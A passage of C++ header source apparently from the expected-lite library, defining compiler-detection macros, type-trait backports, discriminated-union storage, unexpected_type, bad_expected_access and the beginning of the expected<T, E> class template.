// MSVC++ 14.1 _MSC_VER >= 1910 nsel_COMPILER_MSVC_VERSION == 141 (Visual Studio 2017)
// MSVC++ 14.2 _MSC_VER >= 1920 nsel_COMPILER_MSVC_VERSION == 142 (Visual Studio 2019)
#if defined(_MSC_VER) && !defined(__clang__)
# define nsel_COMPILER_MSVC_VER (_MSC_VER )
# define nsel_COMPILER_MSVC_VERSION (_MSC_VER / 10 - 10 * ( 5 + (_MSC_VER < 1900)) )
#else
# define nsel_COMPILER_MSVC_VER 0
# define nsel_COMPILER_MSVC_VERSION 0
#endif
#define nsel_COMPILER_VERSION( major, minor, patch ) ( 10 * ( 10 * (major) + (minor) ) + (patch) )
#if defined(__clang__)
# define nsel_COMPILER_CLANG_VERSION nsel_COMPILER_VERSION(__clang_major__, __clang_minor__, __clang_patchlevel__)
#else
# define nsel_COMPILER_CLANG_VERSION 0
#endif
#if defined(__GNUC__) && !defined(__clang__)
# define nsel_COMPILER_GNUC_VERSION nsel_COMPILER_VERSION(__GNUC__, __GNUC_MINOR__, __GNUC_PATCHLEVEL__)
#else
# define nsel_COMPILER_GNUC_VERSION 0
#endif
// half-open range [lo..hi):
//#define nsel_BETWEEN( v, lo, hi ) ( (lo) <= (v) && (v) < (hi) )
// Method enabling
#define nsel_REQUIRES_0(...) \
template< bool B = (__VA_ARGS__), typename std::enable_if<B, int>::type = 0 >
#define nsel_REQUIRES_T(...) \
, typename std::enable_if< (__VA_ARGS__), int >::type = 0
#define nsel_REQUIRES_R(R, ...) \
typename std::enable_if< (__VA_ARGS__), R>::type
#define nsel_REQUIRES_A(...) \
, typename std::enable_if< (__VA_ARGS__), void*>::type = nullptr
// Presence of language and library features:
#ifdef _HAS_CPP0X
# define nsel_HAS_CPP0X _HAS_CPP0X
#else
# define nsel_HAS_CPP0X 0
#endif
//#define nsel_CPP11_140 (nsel_CPP11_OR_GREATER || nsel_COMPILER_MSVC_VER >= 1900)
// Clang, GNUC, MSVC warning suppression macros:
#ifdef __clang__
# pragma clang diagnostic push
#elif defined __GNUC__
# pragma GCC diagnostic push
#endif // __clang__
#if nsel_COMPILER_MSVC_VERSION >= 140
# pragma warning( push )
# define nsel_DISABLE_MSVC_WARNINGS(codes) __pragma( warning(disable: codes) )
#else
# define nsel_DISABLE_MSVC_WARNINGS(codes)
#endif
#ifdef __clang__
# define nsel_RESTORE_WARNINGS() _Pragma("clang diagnostic pop")
#elif defined __GNUC__
# define nsel_RESTORE_WARNINGS() _Pragma("GCC diagnostic pop")
#elif nsel_COMPILER_MSVC_VERSION >= 140
# define nsel_RESTORE_WARNINGS() __pragma( warning( pop ) )
#else
# define nsel_RESTORE_WARNINGS()
#endif
// Suppress the following MSVC (GSL) warnings:
// - C26409: Avoid calling new and delete explicitly, use std::make_unique<T> instead (r.11)
nsel_DISABLE_MSVC_WARNINGS( 26409 )
//
// expected:
//
namespace nonstd { namespace expected_lite {
// type traits C++17:
namespace std17 {
#if nsel_CPP17_OR_GREATER
using std::conjunction;
using std::is_swappable;
using std::is_nothrow_swappable;
#else // nsel_CPP17_OR_GREATER
namespace detail {
using std::swap;
struct is_swappable
{
template< typename T, typename = decltype( swap( std::declval<T&>(), std::declval<T&>() ) ) >
static std::true_type test( int /* unused */);
template< typename >
static std::false_type test(...);
};
struct is_nothrow_swappable
{
// wrap noexcept(expr) in separate function as work-around for VC140 (VS2015):
template< typename T >
static constexpr bool satisfies()
{
return noexcept( swap( std::declval<T&>(), std::declval<T&>() ) );
}
template< typename T >
static auto test( int ) -> std::integral_constant<bool, satisfies<T>()>{}
template< typename >
static auto test(...) -> std::false_type;
};
} // namespace detail
// is [nothow] swappable:
template< typename T >
struct is_swappable : decltype( detail::is_swappable::test<T>(0) ){};
template< typename T >
struct is_nothrow_swappable : decltype( detail::is_nothrow_swappable::test<T>(0) ){};
// conjunction:
template< typename... > struct conjunction : std::true_type{};
template< typename B1 > struct conjunction<B1> : B1{};
template< typename B1, typename... Bn >
struct conjunction<B1, Bn...> : std::conditional<bool(B1::value), conjunction<Bn...>, B1>::type{};
#endif // nsel_CPP17_OR_GREATER
} // namespace std17
// type traits C++20:
namespace std20 {
#if nsel_CPP20_OR_GREATER
using std::remove_cvref;
#else
template< typename T >
struct remove_cvref
{
typedef typename std::remove_cv< typename std::remove_reference<T>::type >::type type;
};
#endif
} // namespace std20
// forward declaration:
template< typename T, typename E >
class expected;
namespace detail {
/// discriminated union to hold value or 'error'.
template< typename T, typename E >
class storage_t_impl
{
template< typename, typename > friend class nonstd::expected_lite::expected;
public:
using value_type = T;
using error_type = E;
// no-op construction
storage_t_impl() {}
~storage_t_impl() {}
explicit storage_t_impl( bool has_value )
: m_has_value( has_value )
{}
void construct_value( value_type const & e )
{
new( &m_value ) value_type( e );
}
void construct_value( value_type && e )
{
new( &m_value ) value_type( std::move( e ) );
}
template< class... Args >
void emplace_value( Args&&... args )
{
new( &m_value ) value_type( std::forward<Args>(args)...);
}
template< class U, class... Args >
void emplace_value( std::initializer_list<U> il, Args&&... args )
{
new( &m_value ) value_type( il, std::forward<Args>(args)... );
}
void destruct_value()
{
m_value.~value_type();
}
void construct_error( error_type const & e )
{
new( &m_error ) error_type( e );
}
void construct_error( error_type && e )
{
new( &m_error ) error_type( std::move( e ) );
}
template< class... Args >
void emplace_error( Args&&... args )
{
new( &m_error ) error_type( std::forward<Args>(args)...);
}
template< class U, class... Args >
void emplace_error( std::initializer_list<U> il, Args&&... args )
{
new( &m_error ) error_type( il, std::forward<Args>(args)... );
}
void destruct_error()
{
m_error.~error_type();
}
constexpr value_type const & value() const &
{
return m_value;
}
value_type & value() &
{
return m_value;
}
constexpr value_type const && value() const &&
{
return std::move( m_value );
}
nsel_constexpr14 value_type && value() &&
{
return std::move( m_value );
}
value_type const * value_ptr() const
{
return &m_value;
}
value_type * value_ptr()
{
return &m_value;
}
error_type const & error() const &
{
return m_error;
}
error_type & error() &
{
return m_error;
}
constexpr error_type const && error() const &&
{
return std::move( m_error );
}
nsel_constexpr14 error_type && error() &&
{
return std::move( m_error );
}
bool has_value() const
{
return m_has_value;
}
void set_has_value( bool v )
{
m_has_value = v;
}
private:
union
{
value_type m_value;
error_type m_error;
};
bool m_has_value = false;
};
/// discriminated union to hold only 'error'.
template< typename E >
struct storage_t_impl<void, E>
{
template< typename, typename > friend class nonstd::expected_lite::expected;
public:
using value_type = void;
using error_type = E;
// no-op construction
storage_t_impl() {}
~storage_t_impl() {}
explicit storage_t_impl( bool has_value )
: m_has_value( has_value )
{}
void construct_error( error_type const & e )
{
new( &m_error ) error_type( e );
}
void construct_error( error_type && e )
{
new( &m_error ) error_type( std::move( e ) );
}
template< class... Args >
void emplace_error( Args&&... args )
{
new( &m_error ) error_type( std::forward<Args>(args)...);
}
template< class U, class... Args >
void emplace_error( std::initializer_list<U> il, Args&&... args )
{
new( &m_error ) error_type( il, std::forward<Args>(args)... );
}
void destruct_error()
{
m_error.~error_type();
}
error_type const & error() const &
{
return m_error;
}
error_type & error() &
{
return m_error;
}
constexpr error_type const && error() const &&
{
return std::move( m_error );
}
nsel_constexpr14 error_type && error() &&
{
return std::move( m_error );
}
bool has_value() const
{
return m_has_value;
}
void set_has_value( bool v )
{
m_has_value = v;
}
private:
union
{
char m_dummy;
error_type m_error;
};
bool m_has_value = false;
};
template< typename T, typename E, bool isConstructable, bool isMoveable >
class storage_t
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other ) = delete;
storage_t( storage_t && other ) = delete;
};
template< typename T, typename E >
class storage_t<T, E, true, true> : public storage_t_impl<T, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<T, E>( other.has_value() )
{
if ( this->has_value() ) this->construct_value( other.value() );
else this->construct_error( other.error() );
}
storage_t(storage_t && other )
: storage_t_impl<T, E>( other.has_value() )
{
if ( this->has_value() ) this->construct_value( std::move( other.value() ) );
else this->construct_error( std::move( other.error() ) );
}
};
template< typename E >
class storage_t<void, E, true, true> : public storage_t_impl<void, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<void, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<void, E>( other.has_value() )
{
if ( this->has_value() ) ;
else this->construct_error( other.error() );
}
storage_t(storage_t && other )
: storage_t_impl<void, E>( other.has_value() )
{
if ( this->has_value() ) ;
else this->construct_error( std::move( other.error() ) );
}
};
template< typename T, typename E >
class storage_t<T, E, true, false> : public storage_t_impl<T, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<T, E>(other.has_value())
{
if ( this->has_value() ) this->construct_value( other.value() );
else this->construct_error( other.error() );
}
storage_t( storage_t && other ) = delete;
};
template< typename E >
class storage_t<void, E, true, false> : public storage_t_impl<void, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<void, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<void, E>(other.has_value())
{
if ( this->has_value() ) ;
else this->construct_error( other.error() );
}
storage_t( storage_t && other ) = delete;
};
template< typename T, typename E >
class storage_t<T, E, false, true> : public storage_t_impl<T, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other ) = delete;
storage_t( storage_t && other )
: storage_t_impl<T, E>( other.has_value() )
{
if ( this->has_value() ) this->construct_value( std::move( other.value() ) );
else this->construct_error( std::move( other.error() ) );
}
};
template< typename E >
class storage_t<void, E, false, true> : public storage_t_impl<void, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<void, E>( has_value )
{}
storage_t( storage_t const & other ) = delete;
storage_t( storage_t && other )
: storage_t_impl<void, E>( other.has_value() )
{
if ( this->has_value() ) ;
else this->construct_error( std::move( other.error() ) );
}
};
} // namespace detail
/// x.x.5 Unexpected object type; unexpected_type; C++17 and later can also use aliased type unexpected.
#if nsel_P0323R <= 2
template< typename E = std::exception_ptr >
class unexpected_type
#else
template< typename E >
class unexpected_type
#endif // nsel_P0323R
{
public:
using error_type = E;
// x.x.5.2.1 Constructors
// unexpected_type() = delete;
constexpr unexpected_type( unexpected_type const & ) = default;
constexpr unexpected_type( unexpected_type && ) = default;
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, Args&&...>::value
)
>
constexpr explicit unexpected_type( nonstd_lite_in_place_t(E), Args &&... args )
: m_error( std::forward<Args>( args )...)
{}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, std::initializer_list<U>, Args&&...>::value
)
>
constexpr explicit unexpected_type( nonstd_lite_in_place_t(E), std::initializer_list<U> il, Args &&... args )
: m_error( il, std::forward<Args>( args )...)
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible<E,E2>::value
&& !std::is_same< typename std20::remove_cvref<E2>::type, nonstd_lite_in_place_t(E2) >::value
&& !std::is_same< typename std20::remove_cvref<E2>::type, unexpected_type >::value
)
>
constexpr explicit unexpected_type( E2 && error )
: m_error( std::forward<E2>( error ) )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& !std::is_convertible< E2 const &, E>::value /*=> explicit */
)
>
constexpr explicit unexpected_type( unexpected_type<E2> const & error )
: m_error( E{ error.value() } )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& std::is_convertible< E2 const &, E>::value /*=> explicit */
)
>
constexpr /*non-explicit*/ unexpected_type( unexpected_type<E2> const & error )
: m_error( error.value() )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& !std::is_convertible< E2 const &, E>::value /*=> explicit */
)
>
constexpr explicit unexpected_type( unexpected_type<E2> && error )
: m_error( E{ std::move( error.value() ) } )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& std::is_convertible< E2 const &, E>::value /*=> non-explicit */
)
>
constexpr /*non-explicit*/ unexpected_type( unexpected_type<E2> && error )
: m_error( std::move( error.value() ) )
{}
// x.x.5.2.2 Assignment
nsel_constexpr14 unexpected_type& operator=( unexpected_type const & ) = default;
nsel_constexpr14 unexpected_type& operator=( unexpected_type && ) = default;
template< typename E2 = E >
nsel_constexpr14 unexpected_type & operator=( unexpected_type<E2> const & other )
{
unexpected_type{ other.value() }.swap( *this );
return *this;
}
template< typename E2 = E >
nsel_constexpr14 unexpected_type & operator=( unexpected_type<E2> && other )
{
unexpected_type{ std::move( other.value() ) }.swap( *this );
return *this;
}
// x.x.5.2.3 Observers
nsel_constexpr14 E & value() & noexcept
{
return m_error;
}
constexpr E const & value() const & noexcept
{
return m_error;
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
nsel_constexpr14 E && value() && noexcept
{
return std::move( m_error );
}
constexpr E const && value() const && noexcept
{
return std::move( m_error );
}
#endif
// x.x.5.2.4 Swap
nsel_REQUIRES_R( void,
std17::is_swappable<E>::value
)
swap( unexpected_type & other ) noexcept (
std17::is_nothrow_swappable<E>::value
)
{
using std::swap;
swap( m_error, other.m_error );
}
// TODO: ??? unexpected_type: in-class friend operator==, !=
private:
error_type m_error;
};
#if nsel_CPP17_OR_GREATER
/// template deduction guide:
template< typename E >
unexpected_type( E ) -> unexpected_type< E >;
#endif
/// class unexpected_type, std::exception_ptr specialization (P0323R2)
#if !nsel_CONFIG_NO_EXCEPTIONS
#if nsel_P0323R <= 2
// TODO: Should expected be specialized for particular E types such as exception_ptr and how?
// See p0323r7 2.1. Ergonomics, http://wg21.link/p0323
template<>
class unexpected_type< std::exception_ptr >
{
public:
using error_type = std::exception_ptr;
unexpected_type() = delete;
~unexpected_type(){}
explicit unexpected_type( std::exception_ptr const & error )
: m_error( error )
{}
explicit unexpected_type(std::exception_ptr && error )
: m_error( std::move( error ) )
{}
template< typename E >
explicit unexpected_type( E error )
: m_error( std::make_exception_ptr( error ) )
{}
std::exception_ptr const & value() const
{
return m_error;
}
std::exception_ptr & value()
{
return m_error;
}
private:
std::exception_ptr m_error;
};
#endif // nsel_P0323R
#endif // !nsel_CONFIG_NO_EXCEPTIONS
/// x.x.4, Unexpected equality operators
template< typename E1, typename E2 >
constexpr bool operator==( unexpected_type<E1> const & x, unexpected_type<E2> const & y )
{
return x.value() == y.value();
}
template< typename E1, typename E2 >
constexpr bool operator!=( unexpected_type<E1> const & x, unexpected_type<E2> const & y )
{
return ! ( x == y );
}
#if nsel_P0323R <= 2
template< typename E >
constexpr bool operator<( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return x.value() < y.value();
}
template< typename E >
constexpr bool operator>( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return ( y < x );
}
template< typename E >
constexpr bool operator<=( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return ! ( y < x );
}
template< typename E >
constexpr bool operator>=( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return ! ( x < y );
}
#endif // nsel_P0323R
/// x.x.5 Specialized algorithms
template< typename E
nsel_REQUIRES_T(
std17::is_swappable<E>::value
)
>
void swap( unexpected_type<E> & x, unexpected_type<E> & y) noexcept ( noexcept ( x.swap(y) ) )
{
x.swap( y );
}
#if nsel_P0323R <= 2
// unexpected: relational operators for std::exception_ptr:
inline constexpr bool operator<( unexpected_type<std::exception_ptr> const & /*x*/, unexpected_type<std::exception_ptr> const & /*y*/ )
{
return false;
}
inline constexpr bool operator>( unexpected_type<std::exception_ptr> const & /*x*/, unexpected_type<std::exception_ptr> const & /*y*/ )
{
return false;
}
inline constexpr bool operator<=( unexpected_type<std::exception_ptr> const & x, unexpected_type<std::exception_ptr> const & y )
{
return ( x == y );
}
inline constexpr bool operator>=( unexpected_type<std::exception_ptr> const & x, unexpected_type<std::exception_ptr> const & y )
{
return ( x == y );
}
#endif // nsel_P0323R
// unexpected: traits
#if nsel_P0323R <= 3
template< typename E>
struct is_unexpected : std::false_type {};
template< typename E>
struct is_unexpected< unexpected_type<E> > : std::true_type {};
#endif // nsel_P0323R
// unexpected: factory
// keep make_unexpected() removed in p0323r2 for pre-C++17:
template< typename E>
nsel_constexpr14 auto
make_unexpected( E && value ) -> unexpected_type< typename std::decay<E>::type >
{
return unexpected_type< typename std::decay<E>::type >( std::forward<E>(value) );
}
#if nsel_P0323R <= 3
/*nsel_constexpr14*/ auto inline
make_unexpected_from_current_exception() -> unexpected_type< std::exception_ptr >
{
return unexpected_type< std::exception_ptr >( std::current_exception() );
}
#endif // nsel_P0323R
/// x.x.6, x.x.7 expected access error
template< typename E >
class bad_expected_access;
/// x.x.7 bad_expected_access<void>: expected access error
template <>
class bad_expected_access< void > : public std::exception
{
public:
explicit bad_expected_access()
: std::exception()
{}
};
/// x.x.6 bad_expected_access: expected access error
#if !nsel_CONFIG_NO_EXCEPTIONS
template< typename E >
class bad_expected_access : public bad_expected_access< void >
{
public:
using error_type = E;
explicit bad_expected_access( error_type error )
: m_error( error )
{}
virtual char const * what() const noexcept override
{
return "bad_expected_access";
}
nsel_constexpr14 error_type & error() &
{
return m_error;
}
constexpr error_type const & error() const &
{
return m_error;
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
nsel_constexpr14 error_type && error() &&
{
return std::move( m_error );
}
constexpr error_type const && error() const &&
{
return std::move( m_error );
}
#endif
private:
error_type m_error;
};
#endif // nsel_CONFIG_NO_EXCEPTIONS
/// x.x.8 unexpect tag, in_place_unexpected tag: construct an error
struct unexpect_t{};
using in_place_unexpected_t = unexpect_t;
nsel_inline17 constexpr unexpect_t unexpect{};
nsel_inline17 constexpr unexpect_t in_place_unexpected{};
/// class error_traits
#if nsel_CONFIG_NO_EXCEPTIONS
namespace detail {
inline bool text( char const * /*text*/ ) { return true; }
}
template< typename Error >
struct error_traits
{
static void rethrow( Error const & /*e*/ )
{
assert( false && detail::text("throw bad_expected_access<Error>{ e };") );
}
};
template<>
struct error_traits< std::exception_ptr >
{
static void rethrow( std::exception_ptr const & /*e*/ )
{
assert( false && detail::text("throw bad_expected_access<std::exception_ptr>{ e };") );
}
};
template<>
struct error_traits< std::error_code >
{
static void rethrow( std::error_code const & /*e*/ )
{
assert( false && detail::text("throw std::system_error( e );") );
}
};
#else // nsel_CONFIG_NO_EXCEPTIONS
template< typename Error >
struct error_traits
{
static void rethrow( Error const & e )
{
throw bad_expected_access<Error>{ e };
}
};
template<>
struct error_traits< std::exception_ptr >
{
static void rethrow( std::exception_ptr const & e )
{
std::rethrow_exception( e );
}
};
template<>
struct error_traits< std::error_code >
{
static void rethrow( std::error_code const & e )
{
throw std::system_error( e );
}
};
#endif // nsel_CONFIG_NO_EXCEPTIONS
} // namespace expected_lite
// provide nonstd::unexpected_type:
using expected_lite::unexpected_type;
namespace expected_lite {
/// class expected
#if nsel_P0323R <= 2
template< typename T, typename E = std::exception_ptr >
class expected
#else
template< typename T, typename E >
class expected
#endif // nsel_P0323R
{
private:
template< typename, typename > friend class expected;
public:
using value_type = T;
using error_type = E;
using unexpected_type = nonstd::unexpected_type<E>;
template< typename U >
struct rebind
{
using type = expected<U, error_type>;
};
// x.x.4.1 constructors
nsel_REQUIRES_0(
std::is_default_constructible<T>::value
)
nsel_constexpr14 expected()
: contained( true )
{
contained.construct_value( value_type() );
}
nsel_constexpr14 expected( expected const & ) = default;
nsel_constexpr14 expected( expected && ) = default;
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U const &>::value
&& std::is_constructible<E, G const &>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const & , T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& (!std::is_convertible<U const &, T>::value || !std::is_convertible<G const &, E>::value ) /*=> explicit */
)
>
nsel_constexpr14 explicit expected( expected<U, G> const & other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( T{ other.contained.value() } );
else contained.construct_error( E{ other.contained.error() } );
}
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U const &>::value
&& std::is_constructible<E, G const &>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const &, T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& !(!std::is_convertible<U const &, T>::value || !std::is_convertible<G const &, E>::value ) /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( expected<U, G> const & other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( other.contained.value() );
else contained.construct_error( other.contained.error() );
}
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U>::value
&& std::is_constructible<E, G>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const & , T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& (!std::is_convertible<U, T>::value || !std::is_convertible<G, E>::value ) /*=> explicit */
)
>
nsel_constexpr14 explicit expected( expected<U, G> && other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( T{ std::move( other.contained.value() ) } );
else contained.construct_error( E{ std::move( other.contained.error() ) } );
}
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U>::value
&& std::is_constructible<E, G>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const & , T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& !(!std::is_convertible<U, T>::value || !std::is_convertible<G, E>::value ) /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( expected<U, G> && other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( std::move( other.contained.value() ) );
else contained.construct_error( std::move( other.contained.error() ) );
}
template< typename U = T
nsel_REQUIRES_T(
std::is_copy_constructible<U>::value
)
>
nsel_constexpr14 expected( value_type const & value )
: contained( true )
{
contained.construct_value( value );
}
template< typename U = T
nsel_REQUIRES_T(
std::is_constructible<T,U&&>::value
&& !std::is_same<typename std20::remove_cvref<U>::type, nonstd_lite_in_place_t(U)>::value
&& !std::is_same< expected<T,E> , typename std20::remove_cvref<U>::type>::value
&& !std::is_same<nonstd::unexpected_type<E>, typename std20::remove_cvref<U>::type>::value
&& !std::is_convertible<U&&,T>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( U && value ) noexcept
(
std::is_nothrow_move_constructible<U>::value &&
std::is_nothrow_move_constructible<E>::value
)
: contained( true )
{
contained.construct_value( T{ std::forward<U>( value ) } );
}
template< typename U = T
nsel_REQUIRES_T(
std::is_constructible<T,U&&>::value
&& !std::is_same<typename std20::remove_cvref<U>::type, nonstd_lite_in_place_t(U)>::value
&& !std::is_same< expected<T,E> , typename std20::remove_cvref<U>::type>::value
&& !std::is_same<nonstd::unexpected_type<E>, typename std20::remove_cvref<U>::type>::value
&& std::is_convertible<U&&,T>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( U && value ) noexcept
(
std::is_nothrow_move_constructible<U>::value &&
std::is_nothrow_move_constructible<E>::value
)
: contained( true )
{
contained.construct_value( std::forward<U>( value ) );
}
// construct error:
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G const & >::value
&& !std::is_convertible< G const &, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( E{ error.value() } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G const & >::value
&& std::is_convertible< G const &, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( error.value() );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G&& >::value
&& !std::is_convertible< G&&, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( E{ std::move( error.value() ) } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G&& >::value
&& std::is_convertible< G&&, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( std::move( error.value() ) );
}
// in-place construction, value
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<T, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( nonstd_lite_in_place_t(T), Args&&... args )
: contained( true )
{
contained.emplace_value( std::forward<Args>( args )... );
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<T, std::initializer_list<U>, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( nonstd_lite_in_place_t(T), std::initializer_list<U> il, Args&&... args )
: contained( true )
{
contained.emplace_value( il, std::forward<Args>( args )... );
}
// in-place construction, error
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, Args&&... args )
: contained( false )
{
contained.emplace_error( std::forward<Args>( args )... );
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, std::initializer_list<U>, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, std::initializer_list<U> il, Args&&... args )
: contained( false )
{
contained.emplace_error( il, std::forward<Args>( args )... );
}
// x.x.4.2 destructor
// TODO: ~expected: triviality
// Effects: If T is not cv void and is_trivially_destructible_v<T> is false and bool(*this), calls val.~T(). If is_trivially_destructible_v<E> is false and !bool(*this), calls unexpect.~unexpected<E>().
// Remarks: If either T is cv void or is_trivially_destructible_v<T> is true, and is_trivially_destructible_v<E> is true, then this destructor shall be a trivial destructor.
~expected()
{
if ( has_value() ) contained.destruct_value();
else contained.destruct_error();
}
// x.x.4.3 assignment
expected & operator=( expected const & other )
{
expected( other ).swap( *this );
return *this;
}
expected & operator=( expected && other ) noexcept
(
std::is_nothrow_move_constructible< T>::value
&& std::is_nothrow_move_assignable< T>::value
&& std::is_nothrow_move_constructible<E>::value // added for missing
&& std::is_nothrow_move_assignable< E>::value ) // nothrow above
{
expected( std::move( other ) ).swap( *this );
return *this;
}
template< typename U
nsel_REQUIRES_T(
!std::is_same<expected<T,E>, typename std20::remove_cvref<U>::type>::value
&& std17::conjunction<std::is_scalar<T>, std::is_same<T, std::decay<U>> >::value
&& std::is_constructible<T ,U>::value
&& std::is_assignable< T&,U>::value
&& std::is_nothrow_move_constructible<E>::value )
>
expected & operator=( U && value )
{
expected( std::forward<U>( value ) ).swap( *this );
return *this;
}
template< typename G
nsel_REQUIRES_T(
std::is_copy_constructible<E>::value // TODO: std::is_nothrow_copy_constructible<E>
&& std::is_copy_assignable<E>::value
)
>
